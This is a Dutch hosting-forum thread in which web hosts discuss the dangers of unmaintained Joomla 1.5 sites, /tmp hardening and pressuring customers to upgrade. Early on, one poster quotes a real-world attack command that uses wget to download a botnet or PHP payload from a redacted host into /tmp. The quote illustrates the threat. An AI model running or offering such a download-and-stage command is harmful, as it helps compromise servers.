Is het een idee om een centraal statement te maken, iets zoals ook voor IE 6 gemaakt is?

Zeker als je exec aan hebt staan (niet doen dus) en bijvoorbeeld /tmp niet beveiligd hebt... omdat je zeg maar een niet managed VPS ergens hebt... dan is het echt aftellen voordat er hele enge dingen gebeuren...

Klein voorbeeldje -> sh -c cd /tmp ; /usr/bin/wget -t0 -c http://XXXXX:82/293/d/sess_XXX 1> /dev/null 2> /dev/null && echo OK

En in die session file zit dan instructie voor het botnet, of een stukje PHP, dat ben ik ook al tegen gekomen.

Wij staan geen J1.5 meer toe op de server. Misschien wat makkelijk omdat wij ook upgrade aan bieden maar het begint een beetje op WinXP te lijken. :-)

De illusie dat als je /tmp noexec mount dat hackers/crackers/kiddies dan niks kunnen is een beetje ouderwets. Er is echt meer dan /tmp en ik kom als ik iets tegen kom zelden iets in /tmp tegen, ook geen mislukte pogingen

Als ik dat dacht had ik die J1.5 wel met rust gelaten ;) Het verbaasde me juist dat we weer iets meer in /tmp lijken tegen te komen.

Het vervelende is dat nieuwe versies van Joomla nogal slecht backwards compatible zijn met de oudere versies. Dat moedigt niet echt aan om Joomla te updaten naar een nieuwere versie.

Een gemiddelde gebruiker is allang blij dat hij zijn website klaar heeft, en zit er niet op te wachten om opnieuw te beginnen bij iedere nieuwe versie.

Bij WordPress lijkt dat probleem nu enigszins ondervangen door automatische updates naar nieuwe (minor / veiligheidsupdate) versies. Ik heb nog weinig sites meegemaakt die daarna niet meer werken of functionaliteiten verliezen.

Joomla 1.5 is echt verouderd, we zitten nu op 3.3.
Dit is duidelijk een geval van gevaarlijk.
Joomla 1.5 word ook niet meer ondersteund.
Om te upgraden naar de nieuwste versie is niet zo ingewikkeld, alleen moet meestal (altijd) de template vervangen worden.

En vergeet modules niet die niet meer bijgehouden worden. Wij zijn in ieder geval bezig om alle klanten met verouderde versies van Joomla! en WordPress te benaderen.

Wij hebben afgelopen jaar al deze klanten al benaderd. Het overgrote deel onderneemt alleen geen actie. Het contact bestond uit meerdere mails, die steeds dringender werden en waar de consequenties duidelijk in stonden.

Wij hebben afgelopen jaar al deze klanten al benaderd. Het overgrote deel onderneemt alleen geen actie. Het contact bestond uit meerdere mails, die steeds dringender werden en waar de consequenties duidelijk in stonden.

En wat waren de consequenties?

Met consequentie bedoelde ik niet dat er sancties zijn opgelegd maar een duidelijke opsomming van de mogelijke veiligheidsrisico's en dat de website bij een update van PHP mogelijk niet meer naar behoren werkt.

Wij bellen de klant en informeren eerst bij naast dat we aangeven dat bij een volgende update van PHP de site mogelijk niet meer werkt. We zullen zien wat het oplevert.

Die zelfde ronde zijn we nu ook aan het doen, we gaan nog even bepalen wat we doen met de klanten die niet "luisteren".

Ook in ons bedrijf zitten nog redelijk wat klanten die op Joomla 1.5 zitten. Je kunt alleen een klant niet dwingen om te upgraden.

Overigens hebben wij ook nog geen enkele hack gehad.

Joomla 1.5 sites die gehackt worden en waarvan de klant domweg weigert om te updaten of de verantwoordelijkheid hiervoor bij ons probeert neer te leggen verdwijnen enkele reis richting een 'rotzooi' server met daarop andere Joomla 1.5 websites. De klant krijgt dan melding dat de continuïteit van dit platform niet wordt gegarandeerd en dat hij na een upgrade weer terug mag naar een reguliere webhosting server. Klanten welke niet de moeite nemen om hun websites degelijk te onderhouden besteden we weinig tot geen moeite aan.

Die zelfde ronde zijn we nu ook aan het doen, we gaan nog even bepalen wat we doen met de klanten die niet "luisteren".
Bart, mijn vader zei altijd: wie niet luisteren wilt, moet voelen !

Joomla 1.5 sites die gehackt worden en waarvan de klant domweg weigert om te updaten of de verantwoordelijkheid hiervoor bij ons probeert neer te leggen verdwijnen enkele reis richting een 'rotzooi' server met daarop andere Joomla 1.5 websites. De klant krijgt dan melding dat de continuïteit van dit platform niet wordt gegarandeerd en dat hij na een upgrade weer terug mag naar een reguliere webhosting server. Klanten welke niet de moeite nemen om hun websites degelijk te onderhouden besteden we weinig tot geen moeite aan.

Axel,
Dit is precies zoals wij er tegen aankijken. Vergeet niet, het mogen dan wel klanten zijn, maar er is ook sprake van een zakelijke overeenkomst tussen TWEE partijen. Natuurlijk is de klant koning, maar een koning moet ook rekening houden met zijn onderdanen. Het is een wisselwerking en je mag als leverancier best eisen stellen aan je klant als je daar een langdurige relatie mee hebt. Als een klant niet wilt luisteren kan je de overeenkomst eenzijdig opzeggen of veranderen (hij kan een eigen server nemen bij wijze van spreken).
We moeten als hoster af en toe eens wat harder tegen onze klanten durven te zijn.

Joomla 1.5 verbannen gaat voor ons ook wat ver. We hebben ook nog genoeg Joomla 1.0 sites die om een fo andere reden nooit gehacked zijn. Zo hebben we ook Joomla 1.5 sites die nog nooit zijn gehacked, terwijl er anderen zijn die soms meermalen per dag slachtoffer zijn. Ik begrijp de logica niet altijd.

Wij hebben een aantal maanden geleden wel een mail de deur uit gedaan met 'Joomla 1.5 en gehacked? Weg website!'. Dat is vooral omdat Joomla 1.5 toch gewoon kwetsbaar is, en die sites vaak neit te herstellen zijn. Heeft eerlijk gezegd weinig uitgemaakt qua aantal Joomla 1.5 installaties, maar het is wel effectief als zo'n site dan toch wordt misbruikt. Men begrijpt dan in ieder geval je actie en heeft daar vrede mee.

Verder helpt upgraden naar recentere PHP versies ook. Denk aan PHP 5.4, dat zorgt regelmatig toch voor issues met oude PHP code, en dan wijzen we de klant erop dat ie moet upgraden. Zo kun je langzamerhand toch die oude troep wel verbannen

Ik ben zelf verantwoordelijk voor het onderhouden van een oude Mambo site (voor de jongeren, dat is de voorloper van Joomla). Ik wil niets liever dan upgraden, maar er zit zoveel eigen aanpassingen in dat het niet rendabel is om te upgraden naar Joomla 1 (laat staan J2 of J3). Het idee is dus om de website te vervangen, maar daarvoor willen we eigenlijk eerst de app afmaken (die de meeste functionaliteit van de oude website gaat vervangen). Die app had al klaar moeten zijn, maar er is wat frictie tussen de ontwikkelaars dus dat gaat ook niet zo snel als gehoopt.

Al met al blijven de plannen maar in de ijskast liggen, verstrijken de jaren, en zit je nog steeds met een 10 jaar oude site op een kapotgehackt CentOS 5 bakje met PHP 5.1. De meeste Joomla 1 sites hebben een vergelijkbaar verhaal.

Zeg ik dus dat je niet zo hard om moet gaan met Joomla 1 gebruikers? Nee, het tegenovergestelde. Een spectaculaire crash van het hele systeem geeft gebruikers een tastbare reden om vaart te maken.